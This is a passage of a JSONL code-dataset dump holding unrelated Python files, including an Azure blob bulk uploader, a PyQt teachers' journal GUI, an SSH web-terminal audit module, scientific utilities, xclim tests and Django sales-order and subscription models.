}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5937799","text":"\"\"\"\n * PyAzBlob 1.0.0 Python Azure Blob Service Bulk Uploader\n * https://github.com/RobertoPrevato/PyAzBlob\n *\n * Copyright 2017, Roberto Prevato\n * https://robertoprevato.github.io\n *\n * Licensed under the MIT license:\n * http://www.opensource.org/licenses/MIT\n\"\"\"\nimport re\nimport os\nimport errno\nimport fnmatch\nimport mimetypes\nimport time\nfrom pathlib import Path\nfrom core.diagnostics import StopWatch\nfrom core.configuration import config\nfrom core.literature import Scribe\nfrom core.exceptions import ArgumentNullException, InvalidArgument, MissingDependency, ConfigurationError\n\n__all__ = [\"pyazupload\", \"pyazupload_entry\"]\n\n# I am a kind person..\ntry:\n from azure.storage.blob import BlockBlobService, ContentSettings\nexcept ImportError:\n raise MissingDependency(\"azure-storage\")\n\n\n# load configuration\nstorage_config = config[\"StorageAccount\"]\n\nif not storage_config:\n raise ConfigurationError(\"missing StorageAccount configuration\")\n\naccount_name = storage_config[\"name\"]\naccount_key = storage_config[\"key\"]\ncontainer_name = storage_config[\"container\"]\n\n\nif not account_key and not account_name:\n raise ConfigurationError(\"missing Storage Account configuration\")\n\nif not account_name:\n raise ConfigurationError(\"missing Storage Account name configuration\")\n\nif not account_key:\n raise ConfigurationError(\"missing Storage Account key configuration\")\n\nif not container_name:\n raise ConfigurationError(\"missing Storage Account destination container name configuration\")\n\n\ndef first_leaf(a):\n return a[:a.index(\"/\")] if \"/\" in a else a\n\n\n# support for subfolders\nif \"/\" in container_name:\n paths_prefix = container_name[container_name.index(\"/\")+1:]\n container_name = first_leaf(container_name)\nelse:\n paths_prefix = \"\"\n\n\ndef read_lines_strip_comments(p):\n lines = [re.sub(\"#.+$\", \"\", x) for x in Scribe.read_lines(p)]\n return [l for l in lines if l]\n\n\ndef load_ignored():\n calling_path = Path.cwd()\n ignore_file = Path(calling_path / \".pyazblobignore\")\n\n if not ignore_file.is_file():\n # no ignore file specified\n return []\n\n return read_lines_strip_comments(str(ignore_file))\n\n\ndef pyazupload_file(file_path, blob_name, block_blob_service):\n file_mime = mimetypes.guess_type(file_path)[0]\n\n print(\"[*] Uploading {} ({})\".format(file_path, file_mime))\n\n # avoid \"\"\" folders:\n while \"//\" in blob_name:\n blob_name = blob_name.replace(\"//\", \"/\")\n\n while \"\\\\\\\\\" in blob_name:\n blob_name = blob_name.replace(\"\\\\\\\\\", \"\\\\\")\n\n while blob_name.startswith(\"\\\\\"):\n blob_name = blob_name[1:]\n\n block_blob_service.create_blob_from_path(\n container_name,\n blob_name,\n file_path,\n content_settings=ContentSettings(content_type=file_mime)\n )\n\n\ndef ensure_folder(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\nensure_folder(\"logs\")\n\n\nfiles_log = os.path.join(\"logs\", \"-\".join([account_name, container_name.replace(\"\\\\\", \"_\").replace(\"/\", \"_\"), \"files.log\"]))\n\n\ndef pyazupload_entry(root_path,\n cut_path=None,\n ignored=None,\n recurse=False,\n force=False,\n sleep=None,\n block_blob_service=None):\n\n with StopWatch() as sw:\n pyazupload(root_path,\n cut_path,\n 
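                   # A minimal driver sketch for pyazupload_entry above; the paths and
                   # patterns are placeholders:
                   #   pyazupload_entry('/data/photos', cut_path='/data',
                   #                    ignored=['*.tmp'], recurse=True,
                   #                    force=False, sleep=100)  # sleep is in milliseconds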
ignored,\n recurse,\n force,\n sleep,\n block_blob_service)\n\n print(\"[*] Elapsed: {0:.2f}s\".format(sw.elapsed_s))\n\n\ndef pyazupload(root_path,\n cut_path=None,\n ignored=None,\n recurse=False,\n force=False,\n sleep=None,\n block_blob_service=None):\n \"\"\"\n Bulk uploads files found under the given directory inside a configured Azure Storage Blob Service.\n \n :param root_path: root path from which bulk upload should start.\n :param cut_path: portion of root path to cut from uploaded blobs.\n :param ignored: ignored paths.\n :param recurse: whether to recursively upload files in subfolders.\n :param force: whether to force re-upload of files that were uploaded in a previous run (from files.log).\n :param block_blob_service: block blob service to use when uploading files.\n \"\"\"\n if not ignored:\n ignored = []\n \n if force:\n files_uploaded_previously = []\n Scribe.write(\"\", files_log)\n else:\n try:\n files_uploaded_previously = Scribe.read_lines(files_log)\n except FileNotFoundError:\n files_uploaded_previously = []\n\n if not block_blob_service:\n try:\n block_blob_service = BlockBlobService(account_name=account_name,\n account_key=account_key)\n\n # create container (if it already exists, nothing bad happens)\n block_blob_service.create_container(container_name)\n except Exception as ex:\n raise RuntimeError(\"Cannot obtain instance of BlockBlobService. Error details: {}\".format(ex))\n\n if not root_path:\n raise ArgumentNullException(\"root_path\")\n\n p = Path(root_path)\n\n if not p.exists():\n raise InvalidArgument(\"given root path does not exist\")\n\n if not p.is_dir():\n raise InvalidArgument(\"given root path is not a directory\")\n\n # check cut_path\n if cut_path:\n if not root_path.startswith(cut_path):\n raise InvalidArgument(\"root_path must start with given cut_path\")\n else:\n cut_path = root_path\n \n # read ignored files\n ignored_paths = load_ignored() + ignored\n\n # get files;\n items = (x for x in p.iterdir())\n for item in items:\n item_path = str(item)\n\n if os.path.islink(item_path):\n continue\n\n if item_path in files_uploaded_previously:\n print(\"[*] Skipping... \" + item_path)\n continue\n\n if any(fnmatch.fnmatch(item_path, x) for x in ignored_paths):\n print(\"[*] Ignoring... \" + item_path)\n continue\n\n # if the item is a folder, and work is recursive; go to its children\n if item.is_dir():\n if not recurse:\n continue\n else:\n # upload children;\n pyazupload(item_path,\n cut_path,\n ignored,\n recurse,\n force,\n sleep,\n block_blob_service)\n continue\n\n try:\n blob_name = paths_prefix + item_path[len(cut_path):]\n \n pyazupload_file(item_path, blob_name, block_blob_service)\n except Exception as ex:\n print(\"[*] Error while uploading file: \" + item_path + \" - \" + str(ex))\n else:\n # add line to file containing list of uploaded files\n Scribe.add_lines([item_path], files_log)\n\n if sleep and sleep > 1:\n # sleep between uploads\n time.sleep(sleep / 1000.0)\n\n\n","sub_path":"core/pyazblobcore.py","file_name":"pyazblobcore.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55676705","text":"# ! 
env python3.4\n# -*- coding: utf-8 -*-\n\n# view.py\n# describes the TeachersJournal class, which implements the visual presentation\n\nfrom PyQt4 import QtGui, QtCore\nimport sys\nimport controller\nimport os\nfrom datetime import datetime\n\nSIZE_MAINWINDOW = (1000, 500)\nSIZE_NEWPROFILE = (800, 400)\nSIZE_PRINTER = (800, 400)\n\nclass NewProfile(QtGui.QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle(\"New Profile\")\n        self.resize(SIZE_NEWPROFILE[0], SIZE_NEWPROFILE[1])\n\n        self._globalBox_ = QtGui.QHBoxLayout()\n        self._vBox1_ = QtGui.QVBoxLayout()\n        self._vBox2_ = QtGui.QVBoxLayout()\n        self._globalBox_.addLayout(self._vBox2_)\n        self._globalBox_.addLayout(self._vBox1_)\n        self.setLayout(self._globalBox_)\n\n        self._lNameProfile_ = QtGui.QLabel(\"Name Profile:\", parent=self)\n        self._vBox1_.addWidget(self._lNameProfile_)\n\n        self._tProfileName_ = QtGui.QLineEdit(\"newprofile\", parent=self)\n        self._vBox1_.addWidget(self._tProfileName_)\n\n        self._rbShowWorkplane_ = QtGui.QRadioButton(\"Show Workplane\", parent = self)\n        self._rbShowWorkplane_.setChecked(True)\n        self._vBox1_.addWidget(self._rbShowWorkplane_)\n\n        self._rbShowSchedule_ = QtGui.QRadioButton(\"Show Schedule\", parent = self)\n        self._vBox1_.addWidget(self._rbShowSchedule_)\n        \n        #self._bShowWorkplane_ = QtGui.QPushButton(\"Show Workplane\", parent=self)\n        #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        #self._vBox1_.addWidget(self._bShowWorkplane_)\n\n        #self._bShowSchedule_ = QtGui.QPushButton(\"Show Schedule\", parent=self)\n        #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        #self._vBox1_.addWidget(self._bShowSchedule_)\n\n        self._bSave_ = QtGui.QPushButton(\"Save\", parent=self)\n        #QtCore.QObject.connect(self._bSave_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        self._vBox1_.addWidget(self._bSave_)\n\n        self._vBox1_.addStretch()\n\n        self._table_ = QtGui.QTableView(self)\n        self._vBox2_.addWidget(self._table_)\n\n        self.show()\n\n    def setModelForTable(self, model):\n        self._table_.setModel(model)\n\n\nclass Printer(QtGui.QWidget):\n    def __init__(self, parent=None):\n        super().__init__(parent)\n        self.setWindowTitle(\"Print Journal\")\n        self.resize(SIZE_PRINTER[0], SIZE_PRINTER[1])\n\n        self._globalBox_ = QtGui.QHBoxLayout()\n        self._vBoxLeft_ = QtGui.QVBoxLayout()\n        self._vBoxRight_ = QtGui.QVBoxLayout()\n        self._globalBox_.addLayout(self._vBoxLeft_)\n        self._globalBox_.addLayout(self._vBoxRight_)\n        self.setLayout(self._globalBox_)\n\n        self._table_ = QtGui.QTableView(self)\n        self._vBoxLeft_.addWidget(self._table_)\n\n        self._bPrintInXls_ = QtGui.QPushButton(\"Print in XLS-file\", parent=self)\n        #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        self._vBoxRight_.addWidget(self._bPrintInXls_)\n\n        self.show()\n\n    def setModelForTable(self, model):\n        self._table_.setModel(model)\n\n\nclass About(QtGui.QMessageBox):\n    def __init__(self):\n        title = \"About Program\"\n        text = \"\"\"\\\n        Teachers Journal\n        Developer: Anton Barabanov, 2017\n        Written in: Python 3\n        OS: Microsoft Windows, Linux\n        \"\"\"\n        super().__init__()\n        self.about(None, title, text)\n\n\nclass MainWindow(QtGui.QMainWindow):\n\n    def open_profile(self):\n        self.file_profile = QtGui.QFileDialog.getOpenFileName(parent=self,\n                                                              caption=\"Open profile\",\n                                                              filter=\"(*.db)\")\n        self.path_name = os.path.split(self.file_profile)\n        self.show_table()\n\n    def show_table(self):\n        if self.path_name:\n            if self._rbShowJournal_.isChecked():\n                date = 
self._calendar_.selectedDate().toString(\"dd.MM.yyyy\")\n                date = datetime.strptime(date, \"%d.%m.%Y\").date()\n                self._table_.setModel(controller.showTableJournal(self.path_name[0],\n                                                                  self.path_name[1],\n                                                                  date))\n            elif self._rbShowWorkplane_.isChecked():\n                self._table_.setModel(controller.showTableWorkplane(self.path_name[0], self.path_name[1]))\n            elif self._rbShowSchedule_.isChecked():\n                self._table_.setModel(controller.showTableSchedule(self.path_name[0], self.path_name[1]))\n\n    def new_profile(self):\n        self.newProfile = NewProfile()\n\n    def printer(self):\n        self.print = Printer()\n\n    def about(self):\n        self.about = About()\n    \n    def __init__(self):\n        super().__init__()\n        self.path_name = \"\"\n        self.setWindowTitle(\"Teachers Journal\")\n        self.resize(SIZE_MAINWINDOW[0], SIZE_MAINWINDOW[1])\n\n        self._centralWidget_ = QtGui.QWidget(self)\n        self._centralWidget_.resize(SIZE_MAINWINDOW[0], SIZE_MAINWINDOW[1])\n        self._centralWidget_.show()\n        self.setCentralWidget(self._centralWidget_)\n\n        self._mainGrid_ = QtGui.QGridLayout(self._centralWidget_)\n\n        self._calendar_ = QtGui.QCalendarWidget(parent=self._centralWidget_)\n        self._calendar_.clicked.connect(self.show_table)\n        self._mainGrid_.addWidget(self._calendar_, 0, 0, 1, 2)\n\n        _menuBar_ = self.menuBar()\n        self._mFile_ = QtGui.QMenu(\"&File\")\n        _menuBar_.addMenu(self._mFile_)\n        self._mFile_.addAction(\"&Open Profile\", self.open_profile)\n        self._mFile_.addAction(\"&New Profile\", self.new_profile)\n        self._mFile_.addAction(\"&Print\", self.printer)\n        self._mFile_.addAction(\"&Exit\", self.close)\n        self._mHelp_ = QtGui.QMenu(\"&Help\")\n        _menuBar_.addMenu(self._mHelp_)\n        self._mHelp_.addAction(\"&Help\")\n        self._mHelp_.addAction(\"&About\", self.about)\n\n        self._rbShowJournal_ = QtGui.QRadioButton(\"Show Journal\", parent=self)\n        self._rbShowJournal_.setChecked(True)\n        self._rbShowJournal_.toggled.connect(self.show_table)\n        self._mainGrid_.addWidget(self._rbShowJournal_, 1, 0, 1, 2)\n\n        self._rbShowWorkplane_ = QtGui.QRadioButton(\"Show Workplane\", parent=self)\n        self._rbShowWorkplane_.toggled.connect(self.show_table)\n        self._mainGrid_.addWidget(self._rbShowWorkplane_, 2, 0, 1, 2)\n\n        self._rbShowSchedule_ = QtGui.QRadioButton(\"Show Schedule\", parent=self)\n        self._rbShowSchedule_.toggled.connect(self.show_table)\n        self._mainGrid_.addWidget(self._rbShowSchedule_, 3, 0, 1, 2)\n        \n        #self._bOpenWorkplane_ = QtGui.QPushButton(\"Open Workplane\", parent=self._centralWidget_)\n        #QtCore.QObject.connect(self._bOpenProfile_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        #self._mainGrid_.addWidget(self._bOpenWorkplane_, 1, 0)\n\n        #self._bOpenSchedule_ = QtGui.QPushButton(\"Open Schedule\", parent=self._centralWidget_)\n        #QtCore.QObject.connect(self._bOpenProfile_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        #self._mainGrid_.addWidget(self._bOpenSchedule_, 1, 1)\n\n        self._bSave_ = QtGui.QPushButton(\"Save\", parent=self._centralWidget_)\n        #QtCore.QObject.connect(self._bSave_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n        self._mainGrid_.addWidget(self._bSave_, 4, 0, 1, 2)\n\n        self._table_ = QtGui.QTableView(self._centralWidget_)\n        self._mainGrid_.addWidget(self._table_, 0, 2, 5, 1)\n    \n\n\n\n\nif __name__ == \"__main__\":\n    app = QtGui.QApplication(sys.argv)\n    teachJourn = MainWindow()\n    teachJourn.show()\n    sys.exit(app.exec_())\n    \n","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"500882340","text":"# Given an integer array 
nums and a target value target, find the two integers in the array that add up to the target and return their indices. \n# \n# You may assume that each input has exactly one answer, and you may not use the same element in the array twice. \n# \n# Example: \n# \n# Given nums = [2, 7, 11, 15], target = 9\n# \n# Because nums[0] + nums[1] = 2 + 7 = 9\n# the answer returned is [0, 1]\n# \n# Related Topics: array, hash table\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def twoSum(self, nums, target):\n        if not nums or len(nums) <= 1:\n            return None\n        res = {target - nums[0]: 0}\n        # O(n)\n        for i in range(1, len(nums)):\n            if nums[i] in res:\n                return [res[nums[i]], i]\n            else:\n                res[target - nums[i]] = i\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nres = Solution().twoSum([2, 7, 11, 15], 26)\nprint(res)\n\n","sub_path":"Week_01/[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
audit_log.save()\n # hand ssh terminal exit\n queue = channel_layer._connection_list[0]\n redis_channel = queue.pubsub()\n queue.publish(channel, json.dumps(['close']))\n","sub_path":"apps/webterminal/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48178418","text":"#!python\n# -*- coding: utf-8 -*-#\n###########################################################################\n# Author : Bhishan Poudel; Physics Graduate Student, Ohio University\n# Date : Sep 13, 2017 Wed\n# Last update :\n###########################################################################\n\"\"\"\n:Topic: Linear Regression Using Gradient Descent\n\n:Runtime:\n\n\"\"\"\n# Imports\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\n\ndef lin_regr1():\n n = 50\n x = np.random.randn(n)\n y = x * np.random.randn(n)\n\n fig, ax = plt.subplots()\n fit = np.polyfit(x, y, deg=1)\n ax.plot(x, fit[0] * x + fit[1], color='red')\n ax.scatter(x, y)\n\n plt.show()\n\ndef lin_regr2():\n # sample data\n x = np.arange(10)\n y = 5*x + 10\n\n # fit with np.polyfit\n m, b = np.polyfit(x, y, 1)\n\n plt.plot(x, y, '.')\n plt.plot(x, m*x + b, '-')\n plt.show()\n\ndef lin_regr3():\n X = np.random.rand(100)\n Y = X + np.random.rand(100)*0.1\n\n results = sm.OLS(Y,sm.add_constant(X)).fit()\n\n # print (results.summary())\n print(\"results.params = \", results.params)\n w = results.params\n\n plt.scatter(X,Y)\n\n X_plot = np.linspace(0,1,100)\n plt.plot(X_plot, X_plot*w[1] + w[0])\n\n plt.show()\n\ndef lin_regr4():\n x = np.random.rand(100)\n y = x + np.random.rand(100)*0.1\n plt.scatter(x,y)\n plt.plot(x, np.poly1d(np.polyfit(x, y, 1))(x))\n plt.show()\n\n\nif __name__ == \"__main__\":\n lin_regr3()\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw01/lin_reg_try/lin_reg_plot.py","file_name":"lin_reg_plot.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"351597352","text":"import numpy as np\nfrom scipy.linalg import solve\nfrom scipy.sparse import eye, csr_matrix\n\nfrom sklearn.utils import check_array\nfrom sklearn.utils.validation import FLOAT_DTYPES\nfrom sklearn.neighbors import NearestNeighbors\n\n\ndef barycenter_weights(X, Z, reg=1e-3):\n \"\"\"Compute barycenter weights of X from Y along the first axis\n\n We estimate the weights to assign to each point in Y[i] to recover\n the point X[i]. 
The barycenter weights sum to 1.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_dim)\n\n Z : array-like, shape (n_samples, n_neighbors, n_dim)\n\n reg : float, optional\n amount of regularization to add for the problem to be\n well-posed in the case of n_neighbors > n_dim\n\n Returns\n -------\n B : array-like, shape (n_samples, n_neighbors)\n\n Notes\n -----\n See developers note for more information.\n \"\"\"\n X = check_array(X, dtype=FLOAT_DTYPES)\n Z = check_array(Z, dtype=FLOAT_DTYPES, allow_nd=True)\n n_samples, n_neighbors = X.shape[0], Z.shape[1]\n B = np.empty((n_samples, n_neighbors), dtype=X.dtype)\n v = np.ones(n_neighbors, dtype=X.dtype)\n\n # this might raise a LinalgError if G is singular and has trace\n # zero\n for i, A in enumerate(Z.transpose(0, 2, 1)):\n C = A.T - X[i] # broadcasting\n G = np.dot(C, C.T)\n trace = np.trace(G)\n if trace > 0:\n R = reg * trace\n else:\n R = reg\n G.flat[::Z.shape[1] + 1] += R\n w = solve(G, v, sym_pos=True)\n B[i, :] = w / np.sum(w)\n return B\n\n\ndef barycenter_kneighbors_graph(X, n_neighbors, reg=1e-3, n_jobs=None):\n \"\"\"Computes the barycenter weighted graph of k-Neighbors for points in X\n\n Parameters\n ----------\n X : {array-like, NearestNeighbors}\n Sample data, shape = (n_samples, n_features), in the form of a\n numpy array or a NearestNeighbors object.\n\n n_neighbors : int\n Number of neighbors for each sample.\n\n reg : float, optional\n Amount of regularization when solving the least-squares\n problem. Only relevant if mode='barycenter'. If None, use the\n default.\n\n n_jobs : int or None, optional (default=None)\n The number of parallel jobs to run for neighbors search.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n Returns\n -------\n A : sparse matrix in CSR format, shape = [n_samples, n_samples]\n A[i, j] is assigned the weight of edge that connects i to j.\n\n See also\n --------\n sklearn.neighbors.kneighbors_graph\n sklearn.neighbors.radius_neighbors_graph\n \"\"\"\n knn = NearestNeighbors(n_neighbors + 1, n_jobs=n_jobs).fit(X)\n X = knn._fit_X\n n_samples = X.shape[0]\n ind = knn.kneighbors(X, return_distance=False)[:, 1:]\n data = barycenter_weights(X, X[ind], reg=reg)\n indptr = np.arange(0, n_samples * n_neighbors + 1, n_neighbors)\n return csr_matrix((data.ravel(), ind.ravel(), indptr),\n shape=(n_samples, n_samples))\n\n\ndef locally_linear_embedding(\n X, n_neighbors, reg=1e-3, eigen_solver='auto', n_jobs=None):\n \"\"\"Perform a Locally Linear Embedding analysis on the data.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n X : {array-like, NearestNeighbors}\n Sample data, shape = (n_samples, n_features), in the form of a\n numpy array or a NearestNeighbors object.\n\n n_neighbors : integer\n number of neighbors to consider for each point.\n\n reg : float\n regularization constant, multiplies the trace of the local covariance\n matrix of the distances.\n\n eigen_solver : string, {'auto', 'arpack', 'dense'}\n auto : algorithm will attempt to choose the best method for input data\n\n arpack : use arnoldi iteration in shift-invert mode.\n For this method, M may be a dense matrix, sparse matrix,\n or general linear operator.\n Warning: ARPACK can be unstable for some problems. It is\n best to try several random seeds in order to check results.\n\n dense : use standard dense matrix operations for the eigenvalue\n decomposition. 
For this method, M must be an array\n or matrix type. This method should be avoided for\n large problems.\n\n n_jobs : int or None, optional (default=None)\n The number of parallel jobs to run for neighbors search.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n Returns\n -------\n Y : array-like, shape [n_samples, n_components]\n Embedding vectors.\n\n squared_error : float\n Reconstruction error for the embedding vectors. Equivalent to\n ``norm(Y - W Y, 'fro')**2``, where W are the reconstruction weights.\n\n References\n ----------\n\n .. [1] `Roweis, S. & Saul, L. Nonlinear dimensionality reduction\n by locally linear embedding. Science 290:2323 (2000).`\n .. [2] `Donoho, D. & Grimes, C. Hessian eigenmaps: Locally\n linear embedding techniques for high-dimensional data.\n Proc Natl Acad Sci U S A. 100:5591 (2003).`\n .. [3] `Zhang, Z. & Wang, J. MLLE: Modified Locally Linear\n Embedding Using Multiple Weights.`\n http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.70.382\n .. [4] `Zhang, Z. & Zha, H. Principal manifolds and nonlinear\n dimensionality reduction via tangent space alignment.\n Journal of Shanghai Univ. 8:406 (2004)`\n \"\"\"\n if eigen_solver not in ('auto', 'arpack', 'dense'):\n raise ValueError(\"unrecognized eigen_solver '%s'\" % eigen_solver)\n\n nbrs = NearestNeighbors(n_neighbors=n_neighbors + 1, n_jobs=n_jobs)\n nbrs.fit(X)\n X = nbrs._fit_X\n\n N, d_in = X.shape\n\n if n_neighbors >= N:\n raise ValueError(\n \"Expected n_neighbors <= n_samples, \"\n \" but n_samples = %d, n_neighbors = %d\" %\n (N, n_neighbors)\n )\n\n if n_neighbors <= 0:\n raise ValueError(\"n_neighbors must be positive\")\n\n M_sparse = (eigen_solver != 'dense')\n\n W = barycenter_kneighbors_graph(\n nbrs, n_neighbors=n_neighbors, reg=reg, n_jobs=n_jobs)\n # we'll compute M = (I-W)'(I-W)\n # depending on the solver, we'll do this differently\n if M_sparse:\n M = eye(*W.shape, format=W.format) - W\n # M = (M.T * M).tocsr()\n M = (M.T * M)\n else:\n M = (W.T * W - W.T - W).toarray()\n M.flat[::M.shape[0] + 1] += 1 # W = W - I = W - I\n\n return M\n\n","sub_path":"src/cdcpd/lle.py","file_name":"lle.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267957415","text":"import numpy as np\nimport pandas as pd\nimport pytest\nimport xarray as xr\n\nfrom xclim import indices as xci\n\n\nclass TestBaseFlowIndex:\n def test_simple(self, q_series):\n a = np.zeros(365) + 10\n a[10:17] = 1\n q = q_series(a)\n out = xci.base_flow_index(q)\n np.testing.assert_array_equal(out, 1.0 / a.mean())\n\n\nclass TestRBIndex:\n def test_simple(self, q_series):\n a = np.zeros(365)\n a[10] = 10\n q = q_series(a)\n out = xci.rb_flashiness_index(q)\n np.testing.assert_array_equal(out, 2)\n","sub_path":"xclim/testing/tests/test_hydrology.py","file_name":"test_hydrology.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621812772","text":"from datetime import date, datetime\n\nfrom django.db import models, IntegrityError\n\nfrom api_apps.common.models import TimeStamped, Address\nfrom api_apps.products.models import Offer\n\nfrom utils.brain_tree import transaction\nfrom utils.sirius import rate_sales_order\n\n\nclass Cart(TimeStamped):\n\n customer = models.ForeignKey('customers.Customer', related_name='carts')\n 
has_been_purchased = models.BooleanField(default=False)\n \"\"\"\n Related Names:\n .sales_order = [sales.SalesOrder]\n .offers = [sales.CartedOffer]\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Cart, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s [%s]\" % (str(self.customer), str(self.pk))\n\n @property\n def subtotal(self):\n return sum([o.line_total for o in self.offers.all()])\n\n\nclass SalesOrder(TimeStamped):\n\n # created from\n cart = models.OneToOneField(Cart, related_name='sales_order')\n # braintree stuff\n braintree_transaction_id = models.CharField(max_length=255)\n last_4 = models.CharField(max_length=255)\n amount = models.FloatField()\n card_type = models.CharField(max_length=255)\n # shipping stuff\n shipping_address = models.ForeignKey(Address)\n # was this from a subscription?\n subscription = models.ForeignKey('sales.Subscription', blank=True, null=True, default=None)\n # processing flags\n has_been_voided = models.BooleanField(default=False) # braintree manual void\n has_been_refunded = models.BooleanField(default=False) # braintree refund\n needs_to_be_reshipped = models.BooleanField(default=False) # flag for reship\n has_been_reshipped = models.BooleanField(default=False) # set to True after reshipping\n has_been_exported = models.BooleanField(default=False)\n \"\"\"\n Related Names:\n .parcels -> [shipping.Parcel]\n \"\"\"\n\n class Meta:\n verbose_name = 'Sales Order'\n\n def __init__(self, *args, **kwargs):\n super(SalesOrder, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return str(self.cart)\n\n def save(self, *args, **kwargs):\n super(SalesOrder, self).save(*args, **kwargs)\n self.cart.customer.last_purchase_date = datetime.now()\n if self.cart.customer.first_purchase_date is None:\n self.cart.customer.first_purchase_date = datetime.now()\n self.cart.customer.save()\n self.cart.has_been_purchased = True\n self.cart.save()\n try:\n _ = self.cart.customer.current_cart\n except Exception as e:\n print(str(e))\n pass\n\n @property\n def total(self):\n return self.cart.subtotal\n\n def void(self):\n \"\"\"voids an unsettled transaction in braintree\n \"\"\"\n transaction.void_sales_order(self)\n self.has_been_voided = True\n self.save()\n if self.has_been_exported:\n raise Exception(\n 'Void successful, but has already been exported to warehouse. 
Please contact them immediately!'\n )\n else:\n return self\n\n def refund(self):\n \"\"\"refunds a settled transaction in braintree\n \"\"\"\n try:\n transaction.void_sales_order(self)\n self.has_been_voided = True\n self.save()\n except Exception: # traps errors on void\n pass\n transaction.refund_sales_order(self)\n self.has_been_refunded = True\n self.save()\n return self\n\n def make_parcels(self):\n from api_apps.shipping.models import Parcel, SentProduct\n offers, rate, service = rate_sales_order(self)\n parcel = Parcel(sales_order=self, shipping_service=service, rate=rate)\n parcel.save()\n for offer, count in offers.items():\n offer = Offer.objects.get(id=offer)\n for op in offer.products.all():\n sent_product = SentProduct(parcel=parcel, product=op.product, quantity=op.products_per*count)\n sent_product.save()\n return parcel\n\n def get_sku_ids(self):\n return [\n offered_product.product.sku.id\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_sku_names(self):\n return [\n offered_product.product.sku.name\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_brand_names(self):\n return list(set([\n offered_product.product.sku.brand.name\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]))\n\n def get_product_ids(self):\n return [\n offered_product.product.id\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_offer_ids(self):\n return [\n carted_offer.offer.id\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_offer_names(self):\n return [\n carted_offer.offer.name\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_ids(self):\n return [\n carted_offer.deal.id\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_titles(self):\n return [\n carted_offer.deal.title\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_groups(self):\n return list(set([\n group.name\n for carted_offer in self.cart.offers.all()\n for group in carted_offer.deal.groups.all()\n ]))\n\n def get_deal_tags(self):\n return list(set([\n tag.internal\n for carted_offer in self.cart.offers.all()\n for tag in carted_offer.deal.tags.all()\n ]))\n\n\nclass Subscription(TimeStamped):\n\n TOTM_DAY = 10\n TROTM_DAY = 14\n CHOTM_DAY = 7\n\n customer = models.ForeignKey('customers.Customer', related_name='subscriptions')\n offer = models.ForeignKey('products.Offer', related_name='subscriptions')\n deal = models.ForeignKey('products.Deal')\n quantity = models.PositiveIntegerField()\n starts_on = models.DateField()\n ends_on = models.DateField(blank=True, null=True, default=None)\n last_process_date = models.DateField(blank=True, null=True, default=None)\n is_paused = models.BooleanField(default=False)\n is_totm = models.BooleanField(default=False) # toy of the month\n is_trotm = models.BooleanField(default=False) # treat of the month\n is_chotm = models.BooleanField(default=False) # chew of the month\n send_every_n_days = models.PositiveIntegerField(blank=True, null=True, default=None)\n send_on_x_day = models.PositiveIntegerField(blank=True, null=True, default=None)\n strikes = models.IntegerField(default=0)\n\n class Meta:\n unique_together = (\n (\n 'customer', 'offer'\n ),\n )\n\n def __init__(self, *args, **kwargs):\n super(Subscription, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s : 
